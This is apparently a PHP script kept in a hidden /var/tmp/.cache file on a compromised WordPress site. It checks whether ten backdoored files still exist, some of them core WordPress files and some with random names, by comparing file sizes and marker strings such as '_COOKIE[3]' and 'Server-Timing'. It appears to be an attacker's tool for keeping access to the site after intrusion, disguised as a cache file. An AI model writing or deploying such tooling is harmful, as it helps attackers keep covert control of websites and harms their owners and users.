File: //var/tmp/.cache
<?php $r = '/home/thefetcheros/thefetcheros.com'; $x = ["/wp-includes/widgets/class-wp-widget-recent-comments.php"=>"bd@@207520@@_COOKIE[3]",
"/dff5d1.php"=>"bd@@15616@@105",
"/index.php"=>"bd@@545795@@1249",
"/989e9c.php"=>"bd@@15625@@105",
"/3abe6b.php"=>"bd@@29455@@226",
"/wp-activate.php"=>"bd@@710677@@7728",
"/wp-content/themes/twentyfourteen/tag.php"=>"bd@@679477@@2325",
"/067aa8.php"=>"bd@@13140@@105",
"/wp-includes/blocks/comments-title.php"=>"bd@@385369@@If-Modified-Since",
"/wp-includes/blocks/home-link.php"=>"bd@@268488@@Server-Timing"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');